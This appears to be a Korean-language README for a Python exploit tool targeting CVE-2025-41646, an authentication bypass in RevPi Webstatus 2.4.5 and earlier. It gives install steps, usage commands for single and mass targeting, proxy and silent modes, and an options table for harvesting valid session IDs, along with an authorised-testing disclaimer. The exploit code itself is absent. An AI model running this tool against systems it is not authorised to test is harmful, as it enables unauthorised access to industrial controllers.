
Python 기반 익스플로잇 스크립트로, RevPi Webstatus <= 2.4.5의 인증 우회 취약점인 CVE-2025-41646을 대상으로 합니다. 단일/대량 익스플로잇, 프록시, 무음 모드, 침투 테스트용 JSON 출력을 지원합니다.
이것은 RevPi Webstatus <= 2.4.5에 영향을 미치는 인증 우회 취약점인 CVE-2025-41646용 Python3 익스플로잇 스크립트입니다.
/php/dal.php로 원격 HTTP POST 요청pip install -r requirements.txt
requests
urllib3 (usually comes with requests)
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100"
python3 cve_2025_41646_auth_bypass.py -l targets.txt
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --proxy "http://127.0.0.1:8080"
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --silent
python3 cve_2025_41646_auth_bypass.py -u "http://192.168.1.100" --json
요청/응답
이 도구는 교육 및 승인된 침투 테스트 목적으로만 사용됩니다. 명시적 권한 없이 시스템에 대한 무단 사용은 불법입니다.
| Option | Description |
|---|
-u, --url | 대상 URL (예: http://IP) |
-l, --list | 대상 목록이 포함된 파일 |
-o, --output | 유효한 세션 ID를 저장할 출력 파일 |
--proxy | 프록시 사용 (http://127.0.0.1:8080) |
--json | 원시 JSON 출력 |
--silent | 사일런트 모드 (세션 ID만 출력) |